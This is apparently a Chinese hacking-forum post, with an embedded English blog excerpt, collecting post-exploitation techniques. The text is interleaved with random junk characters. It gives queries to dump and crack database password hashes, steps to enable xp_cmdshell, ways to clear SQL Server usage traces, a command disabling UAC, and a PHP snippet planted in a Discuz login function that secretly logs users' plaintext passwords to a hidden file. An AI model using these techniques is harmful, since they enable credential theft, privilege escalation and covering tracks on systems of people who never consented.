4 M3 B8 @4 k, ^' ^0 G0 ^, R
各种类型数据库抓HASH破解最高权限密码!
% L" @2 T9 u0 h5 Q1.sql server2000+ v/ ]/ ^7 e( U7 R+ Z2 K( ]0 k" y
SELECT password from master.dbo.sysxlogins where name='sa'
$ c8 u! l2 d; }+ C) V0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341! H1 ^+ t2 a$ v2 _# @
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A
" `( a! i0 a7 _' {, d+ Y- j- r- [8 p8 |3 Y1 K) G8 K
0×0100- constant header8 L+ H8 u6 H% p+ t3 X. I0 Y
34767D5C- salt
7 X) T8 D8 ^; F M6 Y2 }4 y0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash' f2 W+ n* o6 c, L
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
" {; V, [* y! O# Gcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash6 Y5 t' D0 L6 p, y( p! j
SQL server 2005:-
% q9 ?/ Q: {, I2 [SELECT password_hash FROM sys.sql_logins where name='sa'- H$ t @" S- `
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
) x. b) t+ u; v( f0×0100- constant header9 n& \6 T9 X3 \ w" B% f1 \ |# v) Z
993BF231-salt
7 Y& B% W* V' n/ h5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
. L P2 u4 Q5 t# @0 Icrack case sensitive hash in cain, try brute force and dictionary based attacks.4 ~: U% `; \2 k7 V* G# }& O
0 Q6 y4 {" r& R4 W' Rupdate:- following bernardo’s comments:-
+ Z2 h9 q% s* e e0 ause function fn_varbintohexstr() to cast password in a hex string.
! @% y* `9 w. }* Te.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins Y$ g7 G. \& H+ `
( J' z0 ~% V0 P' r5 n$ M" yMYSQL:-) p: p$ X0 K3 i8 o
; a: V& G, {6 K5 z3 B0 \In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2. @% G/ I- p9 G% @
6 @ g& U' J. d& d- Z0 M2 \*mysql < 4.1
3 T/ ?5 g# C! d% g
+ T- ?7 X- d/ pmysql> SELECT PASSWORD(‘mypass’);
+ C& T) }0 X+ I2 s8 P6 m5 w+——————–+
- @( m. H; ~0 i7 ` {* E" s| PASSWORD(‘mypass’) |4 z# c' n5 w: p' H; D
+——————–+$ s% W( v5 G, P# q8 l
| 6f8c114b58f2ce9e |
3 ]9 o. s" d( w* |' q4 p+——————–+, r: F& M0 S' h6 ]
( {9 M0 S% A, J
*mysql >=4.18 t5 ^$ R3 h7 W( I8 Q. b
6 |; M# p+ C5 n! ^+ W: z3 M" B
mysql> SELECT PASSWORD(‘mypass’);
" e1 t$ J& E. [5 U+——————————————-+8 [" s& V" {$ B, s7 R3 b, E# k* E: x6 @
| PASSWORD(‘mypass’) |
( Y- S4 V* f& ^' I, p9 {! j3 f+——————————————-+
6 y. z, w' F! ~) H* `# {. O J| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |& B, Z: Q- S8 ], b; I- ^& z
+——————————————-+8 U2 `3 I7 x0 i* g4 \* I* |$ Z/ b
2 R) F+ k5 \( M+ ^) YSelect user, password from mysql.user
: j8 r. p( l1 H; J1 s: R/ PThe hashes can be cracked in ‘cain and abel’8 O& B6 a0 b9 n9 s% m% d
|' |+ p8 {4 \% e; o& X& v1 yPostgres:-
: \) w+ n- r/ I+ rPostgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
( ~5 L" _$ q6 M8 eselect usename, passwd from pg_shadow;
3 ?1 w, a# n7 F! L6 ~/ w9 ousename | passwd% u, P$ O* P* X& Q
——————+————————————-" M4 E3 |- A1 t) Q: M2 X
testuser | md5fabb6d7172aadfda4753bf0507ed4396
7 x ]/ W, K/ C$ l# suse mdcrack to crack these hashes:-/ A2 b. c# v4 \; ~& ?- F
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43964 @, j3 l7 F2 e- h4 j# j
& d. Q, M/ G! M! [3 wOracle:-
, u& j& ~, [% z3 b' ?* c8 h5 pselect name, password, spare4 from sys.user$
: N# m& o0 Y/ f; i A+ X- uhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
# h" {3 }3 K6 DMore on Oracle later, i am a bit bored….
% D! J! a9 B) B5 O& P0 P, v% E$ r. w/ a; S! l2 ?) i$ ^
% Q& E* E1 `4 O4 D. y6 I在sql server2005/2008中开启xp_cmdshell% H5 Z9 H( J( \4 e# r3 q
-- To allow advanced options to be changed.* B0 ], }8 s3 K, _0 s' i7 A/ [6 I" W, B
EXEC sp_configure 'show advanced options', 1
8 e& H( [/ j# F r8 ~; lGO
1 i" w2 K2 m8 q0 ^1 M' m-- To update the currently configured value for advanced options.
6 L6 K: X! K- U# BRECONFIGURE
* J# R( D, D7 r! g. SGO' B4 O: n! K/ ~! m% q! Q/ y
-- To enable the feature.' k3 _) `& I5 E/ B
EXEC sp_configure 'xp_cmdshell', 1
' q+ D: C1 G$ B% ^& KGO
* z8 e6 p- m. ^# ~-- To update the currently configured value for this feature.
, d" U3 j* p9 C; r( iRECONFIGURE
4 U" @" Q& n3 ~. H( m. pGO$ c. {, j/ V6 D: p2 ?3 X$ h
SQL 2008 server日志清除,在清楚前一定要备份。# @6 c1 q# k# k% u9 J4 _% c: r
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:6 x; @) \; k+ m& h9 v
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin2 b1 u& P( \1 S
7 u0 n+ X# q5 H* E+ ~# V- S; W对于SQL Server 2008以前的版本:# r' ]: z0 z0 H1 w" w
SQL Server 2005:2 o. R5 I" k0 k) \: a: ~
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat2 K" s$ p: E) u. t
SQL Server 2000:, ~" U1 v! C5 c g2 B
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。' Z2 f+ o* I9 ~3 c. f' n
# i, J$ q, x/ j* @/ N% z# W
本帖最后由 simeon 于 2013-1-3 09:51 编辑
( g8 k' b% K6 V5 u& ?1 `+ r0 r6 X$ Y3 b2 x
" S1 v0 j1 z9 i: O) B) E: H' rwindows 2008 文件权限修改
( f' m# e% z1 Z! L1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx$ q; E6 {) _, i
2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
4 s5 Q; j. s B0 K8 g& m一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
- S% c) v0 L& k, R! U" |& o
$ U2 o- T" v3 ZWindows Registry Editor Version 5.00* N$ l1 ], L6 C- X8 s
[HKEY_CLASSES_ROOT\*\shell\runas]
+ x" a5 A! E, G1 t4 J2 v@="管理员取得所有权"0 z" ~, i7 [' s, {+ T1 _3 y' i/ V
"NoWorkingDirectory"=""2 N/ x! ~2 p% o7 u, f
[HKEY_CLASSES_ROOT\*\shell\runas\command]5 N0 y$ \( m% l' D" n
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# ^* r) V! ~: { w
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
3 r8 a% f# K1 ~# X; ~! |[HKEY_CLASSES_ROOT\exefile\shell\runas2]8 y/ g2 ~- `( X* I
@="管理员取得所有权"8 {$ ?2 ]8 ^) h, ?) J, Y! R
"NoWorkingDirectory"=""
- r) r* p9 |& z. X4 r* s[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]
5 @6 D0 y0 H9 W6 P% v( V9 }@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"8 z' ]! q& C" P' h
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
n5 J& K% |4 A- J( s5 ~& \; {# B7 X' Z( s0 b
[HKEY_CLASSES_ROOT\Directory\shell\runas]6 J8 v4 u# L7 C3 b9 P
@="管理员取得所有权"4 q3 y, D* \ J v. N5 | ^
"NoWorkingDirectory"=""
$ g: P/ B& S9 ^" z[HKEY_CLASSES_ROOT\Directory\shell\runas\command]7 a- e2 y. e0 w; e5 z! p
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- A% t y* C8 m& X! }) a* C% V& |"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
( @+ ^0 W- x: R. ], w0 o) r+ ~) [ \" t" n% v
% w Q, Q* L" q1 r: u; [win7右键“管理员取得所有权”.reg导入
0 l& r2 S+ ^# ^) }0 M% ^# b二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
) N& j: }5 ?6 Z6 [* L1、C:\Windows这个路径的“notepad.exe”不需要替换
5 }7 {# X# P% c, M( m& L: E2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
, x4 [/ c9 J, }5 P$ d, L3、四个“notepad.exe.mui”不要管/ ?" b; `) ~/ d0 r: _: l
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和; i& q; b* E" s* \
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”% v/ S8 X/ M: g: P3 W5 W
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
: A; P9 @7 Q5 w; M4 y替换完之后回到桌面,新建一个txt文档打开看看是不是变了。9 O$ n* i: _8 l6 y2 H1 K: P$ }; V) j
windows 2008中关闭安全策略: * o( [, @- a! [5 U2 Y
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f; p+ _' b3 B3 _: {1 ~
修改uc_client目录下的client.php 在
+ m6 Z4 `: O3 K% m! xfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
' K2 l P a+ n3 J+ ]0 C下加入如上代码,在网站./data/cache/目录下自动生成csslog.php( M* C6 R; N/ [* R v% s
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
- D5 q2 ]$ a. B! T5 Y7 hif(getenv('HTTP_CLIENT_IP')) {
& \% ]( K$ S8 D8 B, I1 H' ?$ J$onlineip = getenv('HTTP_CLIENT_IP');0 K6 E& z8 e' C
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
3 W' _& J6 E5 G1 f/ c8 h$onlineip = getenv('HTTP_X_FORWARDED_FOR');* Z' ]/ Q* W3 n9 G; R! b! X
} elseif(getenv('REMOTE_ADDR')) {- i3 i. _+ {- U/ E$ y R
$onlineip = getenv('REMOTE_ADDR');
% L( x1 l; S# k- V7 ^9 X; F c} else {" e4 v6 f' X! a0 U/ [
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];2 Z1 j, f1 t% V/ w1 G* ^
}! T( w C" _5 y- X4 L; M e( y
$showtime=date("Y-m-d H:i:s");5 ]% H g& E& y
$record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";3 Q$ d' M. ~) J4 o9 w
$handle=fopen('./data/cache/csslog.php','a+');
7 g5 t: p4 }* ? $write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对